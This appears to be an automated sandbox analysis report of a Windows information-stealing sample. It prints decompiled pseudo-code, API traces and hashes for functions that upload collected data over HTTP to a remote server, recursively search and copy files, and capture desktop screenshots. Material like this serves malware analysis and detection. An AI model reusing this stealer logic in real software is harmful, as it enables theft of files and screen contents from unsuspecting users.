							_v1556 = _t152 + _a20 +  *0x4178e4(_v1552);
							_v6572 = RtlAllocateHeap(GetProcessHeap(), 0, _v1556);
							memcpy(_v6572,  &_v1548,  *0x4178e4( &_v1548));
							memcpy(_v6572 +  *0x4178e4(_a20),  &_v1548, _a16);
							memcpy( *0x4178e4( *0x4178e4(_v1552)) + _a20 + _v6572,  &_v1548, _v1552);
							_t235 = _t235 + 0x24;
							HttpSendRequestA(_v1032,  &_v1028,  *0x4178e4(_v1556),  &_v1028, _v6572);
							E0040A270( &_v6572, 4);
							_v6568 = 0;
							_v6564 = 0;
							_v6576 = 0x4000;
							while(1) {
								_v8584 = InternetReadFile(_v1032,  &_v8580, 0x7cf,  &_v8588);
								if(_v8584 == 0) {
									break;
								}
								_t245 = _v8588;
								if(_v8588 != 0) {
									 *((char*)(_t234 + _v8588 - 0x2180)) = 0;
									 *0x4179f8( &_v6556,  &_v8580);
									continue;
								}
								break;
							}
						}
					}
				}
				InternetCloseHandle(_v1032);
				InternetCloseHandle(_v6560);
				InternetCloseHandle(_v520);
				return E00403BE0( &_v6556, _t245,  &_v6556);
			}

0x00403e70
0x00403e78
0x00403e8c
0x00403e9d
0x00403eb0
0x00403eb6
0x00403ec8
0x00403edd
0x00403ee3
0x00403ef2
0x00403ef9
0x00403eff
0x00403f06
0x00403f0e
0x00403f13
0x00403f1e
0x00403f30
0x00403f42
0x00403f56
0x00403f68
0x00403f7a
0x00403f80
0x00403f8d
0x00403fa1
0x00403fc4
0x00403fd1
0x00403fe2
0x00403fec
0x00404000
0x0040400d
0x0040401f
0x00404033
0x00404045
0x0040404b
0x00404059
0x0040405f
0x0040406d
0x0040407f
0x00404090
0x004040a2
0x004040b4
0x004040c8
0x004040da
0x004040e0
0x004040ee
0x004040ff
0x00404111
0x00404117
0x00404125
0x00404137
0x0040413d
0x0040414b
0x0040415d
0x0040416a
0x00404184
0x004041a0
0x004041c2
0x004041e6
0x0040421a
0x0040421f
0x0040424c
0x0040425b
0x00404260
0x0040426a
0x00404274
0x0040427e
0x0040429e
0x004042ab
0x00000000
0x00000000
0x004042ad
0x004042b4
0x004042be
0x004042d4
0x00000000
0x004042d4
0x00000000
0x004042b4
0x004042b6
0x0040400d
0x00403fd1
0x004042e3
0x004042f0
0x004042fd
0x00404316

APIs

GetProcessHeap.KERNEL32(00000000,00800000,?,000001F4,?,00000000,00001388,?,?,004054F8,00BAC128,00BAC218,?,?,?,?), ref: 00403EA9
RtlAllocateHeap.NTDLL(00000000), ref: 00403EB0
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403ED7
InternetSetOptionA.WININET(?,00000002,000927C0,00000004), ref: 00403EF9
lstrcat.KERNEL32(?,00000000), ref: 00403F1E
lstrcat.KERNEL32(?,00416578), ref: 00403F30
lstrcat.KERNEL32(?,------), ref: 00403F42
lstrcat.KERNEL32(?,?), ref: 00403F56
lstrcat.KERNEL32(?,00416584), ref: 00403F68
lstrcat.KERNEL32(?,00416578), ref: 00403F7A
lstrcat.KERNEL32(?,00BA4B50), ref: 00403F8D
lstrcat.KERNEL32(?,?), ref: 00403FA1
InternetConnectA.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00403FBE
HttpOpenRequestA.WININET(00000000,00BB2DD0,?,00BBBBA0,00000000,00000000,00400000,00000000), ref: 00403FFA
lstrcat.KERNEL32(?,------), ref: 0040401F
lstrcat.KERNEL32(?,?), ref: 00404033
lstrcat.KERNEL32(?,00416578), ref: 00404045
lstrcat.KERNEL32(?,00BA4B90), ref: 00404059
lstrcat.KERNEL32(?,00BB2CD0), ref: 0040406D
lstrcat.KERNEL32(?,"), ref: 0040407F
lstrcat.KERNEL32(?,?), ref: 00404090
lstrcat.KERNEL32(?,00416578), ref: 004040A2
lstrcat.KERNEL32(?,------), ref: 004040B4
lstrcat.KERNEL32(?,?), ref: 004040C8
lstrcat.KERNEL32(?,00416578), ref: 004040DA
lstrcat.KERNEL32(?,00BA4BC0), ref: 004040EE
lstrcat.KERNEL32(?,?), ref: 004040FF
lstrcat.KERNEL32(?,"), ref: 00404111
lstrcat.KERNEL32(?,00BBFEC8), ref: 00404125
lstrcat.KERNEL32(?,00416578), ref: 00404137
lstrcat.KERNEL32(?,00BBFFB0), ref: 0040414B
lstrcat.KERNEL32(?,), ref: 0040415D
lstrlen.KERNEL32(?), ref: 0040416A
lstrlen.KERNEL32(?), ref: 0040417C
GetProcessHeap.KERNEL32(00000000,?), ref: 00404193
RtlAllocateHeap.NTDLL(00000000), ref: 0040419A
lstrlen.KERNEL32(?), ref: 004041AD
memcpy.MSVCRT ref: 004041C2
lstrlen.KERNEL32(?,?,?), ref: 004041D9
memcpy.MSVCRT ref: 004041E6
lstrlen.KERNEL32(?), ref: 004041F5
lstrlen.KERNEL32(?,?,00000000), ref: 0040420A
memcpy.MSVCRT ref: 0040421A
lstrlen.KERNEL32(?,?,?), ref: 00404237
HttpSendRequestA.WININET(?,?,00000000), ref: 0040424C
InternetReadFile.WININET(?,?,000007CF,?), ref: 00404298
lstrcat.KERNEL32(?,00000000), ref: 004042D4
InternetCloseHandle.WININET(?), ref: 004042E3
InternetCloseHandle.WININET(?), ref: 004042F0
InternetCloseHandle.WININET(00000000), ref: 004042FD

Part of subcall function 0040A400: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040A421

Strings

------, xrefs: 00403F36, 00404013, 004040A8
, xrefs: 00404151
", xrefs: 00404073
", xrefs: 00404105

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Internetlstrlen$Heap$CloseHandlememcpy$AllocateHttpOpenProcessRequest$ConnectFileOptionReadSendSystemTime
String ID: $"$"$------
API String ID: 1507276828-4248722343
Opcode ID: ff4510828c58f2846e2fb828d07ca4044563f9f2d716e8399b2f72d5ce177d75
Instruction ID: 414267c76955f538a7b98f79b712b26fdb8fbb0e34bee5bb7476e4b6ca2a52f4
Opcode Fuzzy Hash: ff4510828c58f2846e2fb828d07ca4044563f9f2d716e8399b2f72d5ce177d75
Instruction Fuzzy Hash: 10C153F6955218AFDB10DBA0DC48FDA7779AB48700F0085E9F209A7190DB759AC8CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405840, Relevance: 63.4, APIs: 42, Instructions: 389stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00405863
GetVersionExA.KERNEL32(00000094,00000000,00000094), ref: 0040588D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004059B8
lstrlen.KERNEL32(?), ref: 004059C5
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004059F4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405A1D

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$Versionlstrlenmemset
String ID:
API String ID: 1231243492-0
Opcode ID: 50846977cbd6adb5e660995c71e320de88a689ff6af0c92abb4f42396db916ea
Instruction ID: 9c5b4bcbda6fb5efbcba7ae42081a54c623ce6d00fae7f5dafa597aed70ba84e
Opcode Fuzzy Hash: 50846977cbd6adb5e660995c71e320de88a689ff6af0c92abb4f42396db916ea
Instruction Fuzzy Hash: E0F17FB1695214ABEB54DF90DC89FDA7779EB48701F108298F305AB2D0C774EA84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407560, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 301
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407560(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				void* _t103;
				signed int _t104;
				int _t106;
				int _t107;
				signed int _t108;
				intOrPtr _t111;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t177;
				void* _t239;
				void* _t240;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t240 = _t239 + 0xc;
				_t103 = FindFirstFileA( &_v268,  &_v596); // executed
				_v272 = _t103;
				if(_v272 != 0xffffffff) {
					goto L2;
				} else {
					return _t103;
				}
				do {
					L2:
					_t104 =  *0x417a20( &(_v596.cFileName), 0x413038);
					__eflags = _t104;
					if(_t104 == 0) {
						L4:
						goto L16;
					}
					_t108 =  *0x417a20( &(_v596.cFileName), 0x41303c);
					__eflags = _t108;
					if(_t108 != 0) {
						wsprintfA( &_v860, "%s\%s");
						_t240 = _t240 + 0x10;
						_t111 =  *0x41752c; // 0xbbbd08
						__eflags =  *0x417a20( &(_v596.cFileName), _t111, _a8,  &(_v596.cFileName));
						if(__eflags != 0) {
							_t177 =  *0x417050; // 0xbb2d20
							__eflags =  *0x417a20( &(_v596.cFileName), _t177);
							if(__eflags != 0) {
								_t114 =  *0x4175a0; // 0xbbbd68
								__eflags =  *0x417a20( &(_v596.cFileName), _t114);
								if(__eflags != 0) {
									_t116 =  *0x41735c; // 0xbb2d30
									__eflags =  *0x417a20( &(_v596.cFileName), _t116);
									if(__eflags != 0) {
										__eflags = _v596.dwFileAttributes & 0x00000010;
										if((_v596.dwFileAttributes & 0x00000010) != 0) {
											_t91 =  &_a20; // 0x413042
											E00407560( &(_v596.cFileName),  &_v860, _a12, _a16,  *_t91, _a24); // executed
											_t240 = _t240 + 0x18;
										}
									} else {
										GetCurrentDirectoryA(0x104,  &_v1388);
										 *0x4179f8( &_v1388, 0x413040);
										 *0x4179f8( &_v1388, E0040A400( &(_v596.cFileName), __eflags, 8));
										CopyFileA( &_v860,  &_v1388, 1); // executed
										_t70 =  &_a20; // 0x413042
										E00407290(_a12, __eflags,  &_v1388, _a4, _a12, _a16,  *_t70, _a24); // executed
										_t76 =  &_a20; // 0x413042
										E004073D0(_a12, __eflags,  &_v1388, _a4, _a12, _a16,  *_t76, _a24); // executed
										DeleteFileA( &_v1388); // executed
										E0040A270( &_v1388, 0x104);
										_t84 =  &_a20; // 0x413042
										E00407560( &(_v596.cFileName),  &_v860, _a12, _a16,  *_t84, _a24); // executed
										_t240 = _t240 + 0x4c;
									}
								} else {
									GetCurrentDirectoryA(0x104,  &_v1124);
									 *0x4179f8( &_v1124, 0x413040);
									 *0x4179f8( &_v1124, E0040A400( &(_v596.cFileName), __eflags, 8));
									CopyFileA( &_v860,  &_v1124, 1); // executed
									_t44 =  &_a20; // 0x413042
									E00407060(_a12, __eflags,  &_v1124, _a4, _a12, _a16,  *_t44, _a24); // executed
									_t50 =  &_a20; // 0x413042
									E00406ED0(_a12, __eflags,  &_v1124, _a4, _a12, _a16,  *_t50, _a24); // executed
									DeleteFileA( &_v1124); // executed
									E0040A270( &_v1124, 0x104);
									_t58 =  &_a20; // 0x413042
									E00407560( &(_v596.cFileName),  &_v860, _a12, _a16,  *_t58, _a24); // executed
									_t240 = _t240 + 0x4c;
								}
							} else {
								_t26 =  &_a20; // 0x413042
								E00406AD0(__eflags,  &_v860, _a4, _a12, _a16,  *_t26, _a24); // executed
								_t32 =  &_a20; // 0x413042
								E00407560( &(_v596.cFileName),  &_v860, _a12, _a16,  *_t32, _a24); // executed
								_t240 = _t240 + 0x30;
							}
						} else {
							_t13 =  &_a20; // 0x413042
							E00406840(_a12, __eflags, _a4,  &_v860, _a12, _a16,  *_t13); // executed
							_t19 =  &_a20; // 0x413042
							E00407560( &(_v596.cFileName),  &_v860, _a12, _a16,  *_t19, _a24); // executed
							_t240 = _t240 + 0x2c;
						}
						E0040A270( &_v860, 0x104);
						goto L16;
					}
					goto L4;
					L16:
					_t106 = FindNextFileA(_v272,  &_v596); // executed
					__eflags = _t106;
				} while (_t106 != 0);
				_t107 = FindClose(_v272); // executed
				return _t107;
			}

0x0040756c
0x00407579
0x0040757f
0x00407590
0x00407596
0x004075a3
0x00000000
0x00000000
0x00000000
0x00000000
0x004075aa
0x004075aa
0x004075b6
0x004075bc
0x004075be
0x004075d6
0x00000000
0x004075d6
0x004075cc
0x004075d2
0x004075d4
0x004075f2
0x004075f8
0x004075fb
0x0040760e
0x00407610
0x0040765c
0x00407670
0x00407672
0x004076c2
0x004076d5
0x004076d7
0x004077be
0x004077d1
0x004077d3
0x004078bd
0x004078c0
0x004078c6
0x004078e0
0x004078e5
0x004078e5
0x004077d9
0x004077e5
0x004077f7
0x0040780f
0x00407825
0x0040782f
0x00407846
0x00407852
0x00407869
0x00407878
0x0040788a
0x00407893
0x004078ad
0x004078b2
0x004078b2
0x004076dd
0x004076e9
0x004076fb
0x00407713
0x00407729
0x00407733
0x0040774a
0x00407756
0x0040776d
0x0040777c
0x0040778e
0x00407797
0x004077b1
0x004077b6
0x004077b6
0x00407674
0x00407678
0x0040768f
0x0040769b
0x004076b5
0x004076ba
0x004076ba
0x00407612
0x00407612
0x00407629
0x00407635
0x0040764f
0x00407654
0x00407654
0x004078f4
0x00000000
0x004078f4
0x00000000
0x004078f9
0x00407907
0x0040790d
0x0040790d
0x0040791c
0x00000000

APIs

wsprintfA.USER32 ref: 00407579
FindFirstFileA.KERNEL32(?,?), ref: 00407590
StrCmpCA.SHLWAPI(?,00413038), ref: 004075B6
StrCmpCA.SHLWAPI(?,0041303C), ref: 004075CC
FindNextFileA.KERNEL32(000000FF,?), ref: 00407907
FindClose.KERNEL32(000000FF), ref: 0040791C

Strings

%s\%s, xrefs: 004075E6
%s\*, xrefs: 0040756D
B0A, xrefs: 004078C6, 0040782F, 00407852, 00407893, 00407733, 00407756, 00407797, 00407678, 0040769B, 00407612, 00407635, 00407615, 00407638, 0040767B, 0040769E, 00407736, 00407759, 0040779A, 00407832, 00407855, 00407896, 004078C9

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*$B0A
API String ID: 180737720-2372131211
Opcode ID: 4b6fbe71c76414f0461338c2df92df78c12b921010243e5759b40977a44a84b1
Instruction ID: 70e2794d6ee99a84235c6ff14e334652d0431aefa218683b882e5d50c41d7c37
Opcode Fuzzy Hash: 4b6fbe71c76414f0461338c2df92df78c12b921010243e5759b40977a44a84b1
Instruction Fuzzy Hash: 62B134B2904209ABCB14EF94DC85EEB73BDBF5C700F04859DB609A7140E634EA95CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004011F0, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 134
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004011F0(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				char _v1652;
				void* _t43;
				int _t46;
				intOrPtr _t66;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t99 = _t98 + 0xc;
				_t43 = FindFirstFileA( &_v268,  &_v596); // executed
				_v272 = _t43;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x413038);
						_push( &(_v596.cFileName));
						if( *0x417a20() == 0) {
							L4:
							goto L11;
						}
						_push(0x41303c);
						_push( &(_v596.cFileName));
						if( *0x417a20() != 0) {
							_push( &(_v596.cFileName));
							_push(_a8);
							wsprintfA( &_v1124, "%s\%s");
							_t100 = _t99 + 0x10;
							_push(0x413042);
							_push(_a4);
							if( *0x417a20() != 0) {
								_push( &(_v596.cFileName));
								_push(_a4);
								wsprintfA( &_v860, "%s\%s");
								_t101 = _t100 + 0x10;
							} else {
								wsprintfA( &_v860, 0x41304c,  &(_v596.cFileName));
								_t101 = _t100 + 0xc;
							}
							_t18 =  &_a12; // 0x413042
							if(PathMatchSpecA( &(_v596.cFileName),  *_t18) != 0) {
								E0040A270( &_v1652, 0x104);
								E0040A270( &_v1388, 0x104);
								 *0x4179f8( &_v1652, _a8);
								 *0x4179f8( &_v1652, 0x413040);
								 *0x4179f8( &_v1652,  &(_v596.cFileName));
								_t66 =  *0x417598; // 0xbac200
								 *0x4179f8( &_v1388, _t66);
								 *0x4179f8( &_v1388,  &_v860);
								E00412360(_a16,  &_v1388,  &_v1652);
								_t101 = _t101 + 0xc;
							}
							_t34 =  &_a12; // 0x413042
							E004011F0( &_v860,  &_v1124,  *_t34, _a16); // executed
							_t99 = _t101 + 0x10;
							goto L11;
						}
						goto L4;
						L11:
						_t46 = FindNextFileA(_v272,  &_v596); // executed
					} while (_t46 != 0);
					return FindClose(_v272);
				}
				return _t43;
			}

0x004011fc
0x00401209
0x0040120f
0x00401220
0x00401226
0x00401233
0x0040123a
0x0040123a
0x00401245
0x0040124e
0x00401266
0x00000000
0x00401266
0x00401250
0x0040125b
0x00401264
0x00401271
0x00401275
0x00401282
0x00401288
0x0040128b
0x00401293
0x0040129c
0x004012c2
0x004012c6
0x004012d3
0x004012d9
0x0040129e
0x004012b1
0x004012b7
0x004012b7
0x004012dc
0x004012ef
0x00401301
0x00401312
0x00401322
0x00401334
0x00401348
0x0040134e
0x0040135b
0x0040136f
0x00401387
0x0040138c
0x0040138c
0x00401393
0x004013a5
0x004013aa
0x00000000
0x004013aa
0x00000000
0x004013ad
0x004013bb
0x004013c1
0x00000000
0x004013d0
0x00000000

APIs

wsprintfA.USER32 ref: 00401209
FindFirstFileA.KERNELBASE(?,?), ref: 00401220
StrCmpCA.SHLWAPI(?,00413038), ref: 00401246
StrCmpCA.SHLWAPI(?,0041303C), ref: 0040125C
FindNextFileA.KERNELBASE(000000FF,?), ref: 004013BB
FindClose.KERNEL32(000000FF), ref: 004013D0

Strings

B0A, xrefs: 004012DC, 00401393, 004012DF, 00401396
%s\%s, xrefs: 00401276, 004012C7
%s\*, xrefs: 004011FD

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*$B0A
API String ID: 180737720-2372131211
Opcode ID: 8606e0b6cbb3fe3d642f9239d0eabe8318d71c6b636de3ce861b7120086160fc
Instruction ID: 074ed8ec01bb0fd2b5325aeaedfb1d98112cc265743a99b2cf67e115f78592f1
Opcode Fuzzy Hash: 8606e0b6cbb3fe3d642f9239d0eabe8318d71c6b636de3ce861b7120086160fc
Instruction Fuzzy Hash: 405197B1914218ABDB10DFA0DC88EEA777CBF48701F0085EDB609E6150E775AB84CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A840, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040A840(void* __eflags, char _a8) {
				void* _v8;
				struct HWND__* _v12;
				char _v16;
				char _v20;
				char _v36;
				struct HBITMAP__* _v44;
				intOrPtr _v48;
				struct tagRECT _v64;
				struct HDC__* _v68;
				char _v72;
				void* _v76;
				char _v92;
				struct HDC__* _v96;
				void* _t50;
				void* _t52;
				void* _t65;
				void* _t68;
				intOrPtr _t70;
				long _t71;
				intOrPtr _t100;

				E0040A0A0( &_v36, 0, 0, 0);
				E0040A270( &_v36, 0x10);
				_v36 = 1;
				_t5 =  &_v16; // 0x40544f
				_t50 =  *0x417a00(_t5,  &_v36, 0); // executed
				if(_t50 == 0) {
					_t52 =  *0x417968(0, 1,  &_v20); // executed
					if(_t52 == 0) {
						_v12 = GetDesktopWindow();
						GetWindowRect(_v12,  &_v64);
						_v96 = GetDC(_v12);
						_v68 = CreateCompatibleDC(_v96);
						_v44 = CreateCompatibleBitmap(_v96, _v64.right, _v64.bottom);
						_v8 = SelectObject(_v68, _v44);
						BitBlt(_v68, 0, 0, _v64.right, _v64.bottom, _v96, 0, 0, 0xcc0020);
						_t65 =  *0x4179bc(_v44, 0,  &_v72); // executed
						if(_t65 == 0) {
							if(E0040A700(L"image/jpeg",  &_v92) != 0xffffffff) {
								_t68 =  *0x41798c(_v72, _v20,  &_v92, 0); // executed
								if(_t68 == 0) {
									_t70 =  *0x417870(_v20,  &_v76);
									GlobalFix(_v76);
									_v48 = _t70;
									_t71 = GlobalSize(_v76);
									_t100 =  *0x4172a8; // 0xbc8930
									_t37 =  &_a8; // 0x40544f
									E00412380( *_t37, _t100, _v48, _t71);
									SelectObject(_v68, _v8);
									 *0x4178d0(_v72);
									_t41 =  &_v16; // 0x40544f
									 *0x4179e0( *_t41);
									DeleteObject(_v44);
									DeleteObject(_v68);
									ReleaseDC(_v12, _v96);
									CloseWindow(_v12); // executed
									return 0;
								}
								return 0;
							}
							return 0;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x0040a84f
0x0040a85a
0x0040a85f
0x0040a86c
0x0040a870
0x0040a878
0x0040a889
0x0040a891
0x0040a8a0
0x0040a8ab
0x0040a8bb
0x0040a8c8
0x0040a8dd
0x0040a8ee
0x0040a90e
0x0040a91e
0x0040a926
0x0040a943
0x0040a95a
0x0040a962
0x0040a973
0x0040a97d
0x0040a983
0x0040a98a
0x0040a995
0x0040a99c
0x0040a9a0
0x0040a9b0
0x0040a9ba
0x0040a9c0
0x0040a9c4
0x0040a9ce
0x0040a9d8
0x0040a9e6
0x0040a9f0
0x00000000
0x0040a9f6
0x00000000
0x0040a964
0x00000000
0x0040a945
0x00000000
0x0040a928
0x00000000
0x0040a893
0x00000000

Strings

image/jpeg, xrefs: 0040A933
OT@P, xrefs: 0040A99C, 0040A99F
OT@P, xrefs: 0040A86C, 0040A9C0, 0040A86F, 0040A9C3

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: OT@P$OT@P$image/jpeg
API String ID: 0-3614656744
Opcode ID: 235b9f7ee8c2802e3ab41278bacc944f3972758b89eccf49a3d1077a6cea5a74
Instruction ID: d4ce313c51baec3b4ae918bac6f36b1d4c5a1145b5fa0668776aacc1fe628858
Opcode Fuzzy Hash: 235b9f7ee8c2802e3ab41278bacc944f3972758b89eccf49a3d1077a6cea5a74
Instruction Fuzzy Hash: 9C510FB6A14208AFDB04DBE4DC88FEEB7B9BF4C700F148929F605E7290D6349941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 95
fileCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00401000(CHAR* _a8, char _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				void* _t33;
				intOrPtr _t67;
				void* _t72;
				void* _t73;

				SetCurrentDirectoryA(_a8);
				_t2 =  &_a12; // 0x413042
				_push( *_t2);
				_push(_a8);
				wsprintfA( &_v268, "%s\%s");
				_t73 = _t72 + 0x10;
				_t33 = FindFirstFileA( &_v268,  &_v596); // executed
				_v272 = _t33;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x413038);
						_push( &(_v596.cFileName));
						if( *0x417a20() == 0) {
							L4:
							goto L6;
						}
						_push(0x41303c);
						_push( &(_v596.cFileName));
						if( *0x417a20() != 0) {
							E0040A270( &_v1124, 0x104);
							E0040A270( &_v860, 0x104);
							 *0x4179f8( &_v1124, _a8);
							 *0x4179f8( &_v1124,  &(_v596.cFileName));
							_t67 =  *0x417598; // 0xbac200
							 *0x4179f8( &_v860, _t67);
							 *0x4179f8( &_v860, _a20);
							 *0x4179f8( &_v860, 0x413040);
							 *0x4179f8( &_v860,  &(_v596.cFileName));
							E00412360(_a24,  &_v860,  &_v1124);
							_t73 = _t73 + 0xc;
							goto L6;
						}
						goto L4;
						L6:
					} while (FindNextFileA(_v272,  &_v596) != 0);
					return FindClose(_v272);
				}
				return _t33;
			}

0x0040100d
0x00401013
0x00401016
0x0040101a
0x00401027
0x0040102d
0x0040103e
0x00401044
0x00401051
0x00401058
0x00401058
0x00401063
0x0040106c
0x00401084
0x00000000
0x00401084
0x0040106e
0x00401079
0x00401082
0x00401095
0x004010a6
0x004010b6
0x004010ca
0x004010d0
0x004010de
0x004010ef
0x00401101
0x00401115
0x0040112d
0x00401132
0x00000000
0x00401132
0x00000000
0x00401135
0x00401149
0x00000000
0x00401158
0x00000000

APIs

SetCurrentDirectoryA.KERNEL32(?), ref: 0040100D
wsprintfA.USER32 ref: 00401027
FindFirstFileA.KERNELBASE(?,?), ref: 0040103E
StrCmpCA.SHLWAPI(?,00413038), ref: 00401064
StrCmpCA.SHLWAPI(?,0041303C), ref: 0040107A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401143
FindClose.KERNEL32(000000FF), ref: 00401158

Strings

%s\%s, xrefs: 0040101B
B0A, xrefs: 00401013, 00401016

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextwsprintf
String ID: %s\%s$B0A
API String ID: 2809309208-2198203994
Opcode ID: 0b3c7944e6f686cab82e16ead64888ca3fa6875b781df3a66c6703d94358328b
Instruction ID: ad22ac3a694ab9516b31565d83b758ccd8b4da20d2cfa25f14aff741ee75738b
Opcode Fuzzy Hash: 0b3c7944e6f686cab82e16ead64888ca3fa6875b781df3a66c6703d94358328b
Instruction Fuzzy Hash: E231A9B151421DABCB10EFA0DC88EEB777CBB48701F0086A9B61AA2150D7749BC8CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00408820, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 183
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00408820(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				char _v1652;
				char _v1916;
				char _v2180;
				void* _t57;
				int _t60;
				CHAR* _t64;
				CHAR* _t66;
				void* _t78;
				void* _t80;
				void* _t82;
				CHAR* _t106;
				CHAR* _t107;
				CHAR* _t121;
				CHAR* _t122;
				void* _t135;
				void* _t136;
				void* _t143;
				void* _t144;

				wsprintfA( &_v268, "%s\\*.*", _a12);
				_t136 = _t135 + 0xc;
				_t57 = FindFirstFileA( &_v268,  &_v596); // executed
				_v272 = _t57;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x413038);
						_push( &(_v596.cFileName));
						if( *0x417a20() == 0) {
							L4:
							goto L12;
						}
						_push(0x41303c);
						_push( &(_v596.cFileName));
						if( *0x417a20() != 0) {
							_t64 =  *0x417398; // 0xbcdbd8
							wsprintfA( &_v1124, _t64, _a12,  &(_v596.cFileName), _a4);
							_t66 =  *0x4176c4; // 0xbc8990
							wsprintfA( &_v1652, _t66,  &_v1124);
							_t121 =  *0x417590; // 0xbcdc08
							wsprintfA( &_v1388, _t121, _a12,  &(_v596.cFileName), _a4);
							_t122 =  *0x4176c4; // 0xbc8990
							wsprintfA( &_v2180, _t122,  &_v1388);
							_t106 =  *0x4171d8; // 0xbd28d0
							wsprintfA( &_v1916, _t106, _a12,  &(_v596.cFileName), _a4);
							_t107 =  *0x4176c4; // 0xbc8990
							wsprintfA( &_v860, _t107,  &_v1916);
							_t78 = E0040A6C0( &_v1652); // executed
							_t143 = _t136 + 0x64;
							if(_t78 != 0) {
								E00408650( &_v1124, _a8, _a16,  &(_v596.cFileName), _a20);
								_t143 = _t143 + 0x14;
							}
							_t80 = E0040A6C0( &_v2180); // executed
							_t144 = _t143 + 4;
							if(_t80 != 0) {
								E00408650( &_v1388, _a8, _a16,  &(_v596.cFileName), _a20);
								_t144 = _t144 + 0x14;
							}
							_t82 = E0040A6C0( &_v860); // executed
							_t136 = _t144 + 4;
							if(_t82 != 0) {
								E00408650( &_v1916, _a8, _a16,  &(_v596.cFileName), _a20);
								_t136 = _t136 + 0x14;
							}
							E0040A270( &_v1124, 0x104);
							E0040A270( &_v1652, 0x104);
							E0040A270( &_v1388, 0x104);
							E0040A270( &_v2180, 0x104);
							E0040A270( &_v1916, 0x104);
							E0040A270( &_v860, 0x104);
							goto L12;
						}
						goto L4;
						L12:
						_t60 = FindNextFileA(_v272,  &_v596); // executed
					} while (_t60 != 0);
					return FindClose(_v272);
				}
				return _t57;
			}

0x00408839
0x0040883f
0x00408850
0x00408856
0x00408863
0x0040886a
0x0040886a
0x00408875
0x0040887e
0x00408896
0x00000000
0x00408896
0x00408880
0x0040888b
0x00408894
0x004088aa
0x004088b7
0x004088c7
0x004088d4
0x004088ec
0x004088fa
0x0040890a
0x00408918
0x00408930
0x0040893e
0x0040894e
0x0040895c
0x0040896c
0x00408971
0x00408976
0x00408992
0x00408997
0x00408997
0x004089a1
0x004089a6
0x004089ab
0x004089c7
0x004089cc
0x004089cc
0x004089d6
0x004089db
0x004089e0
0x004089fc
0x00408a01
0x00408a01
0x00408a10
0x00408a21
0x00408a32
0x00408a43
0x00408a54
0x00408a65
0x00000000
0x00408a65
0x00000000
0x00408a6a
0x00408a78
0x00408a7e
0x00000000
0x00408a8d
0x00000000

APIs

wsprintfA.USER32 ref: 00408839
FindFirstFileA.KERNELBASE(?,?), ref: 00408850
StrCmpCA.SHLWAPI(?,00413038), ref: 00408876
StrCmpCA.SHLWAPI(?,0041303C), ref: 0040888C
FindNextFileA.KERNELBASE(000000FF,?), ref: 00408A78
FindClose.KERNEL32(000000FF), ref: 00408A8D

Strings

%s\*.*, xrefs: 0040882D

Memory Dump Source

